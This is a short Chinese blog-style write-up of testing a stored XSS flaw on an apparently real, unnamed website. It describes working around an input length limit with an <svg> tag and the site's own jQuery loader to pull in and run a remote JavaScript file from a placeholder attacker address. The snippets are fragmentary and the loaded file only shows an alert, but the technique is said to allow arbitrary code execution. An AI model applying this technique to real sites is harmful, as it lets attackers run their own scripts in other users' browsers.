这次 ,主要是别人给讲会的 ,自己也听明白了,记录下 操作过程 ....
首先,寻找有显示的注入点,找到一处 ,直接上手测试弹窗
输入完成发现并没有理想的直接弹窗 ,当点击删除,突然弹窗
这里是运用ajax ,单独局部加载的 ,也就是除非刷新这一块东西,否则代码不会更新,这样的js 代码岂不是很无用?!
谁闲得没事 ,点你个人兴趣啊 ,正统的应该是 ,你打开个人页面 直接弹窗,这是理想的
然后换标签注入 这里使用<svg> 然后是调用js 代码执行远程js 调用
只能这样
b='script' 长度11
a.createElement(b) 长度19 a=document.createElement('script');
a.src=xxx 你的远程js地址
document.head.append(child)
精简?
a=document; 长度12
但是,看看长度不可行!!!
没办法了 ,只能看看他们有没有jquery 可以使用了
看到这个 ,有重新燃起来插它的欲火 哈哈
我们这样用, 首先将地址 用变量b 保存起来
然后调用 $loadJs(b) 执行 js代码 ,让他们自己的东西 插自己
最后 调用js 文件 (文件里边只有一个alert(/xss/)),然后弹窗 ,这次弹窗和之前的弹窗就不一样了 ,这个文件是自己可以控制的 ,
可以执行任意代码~
2536
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
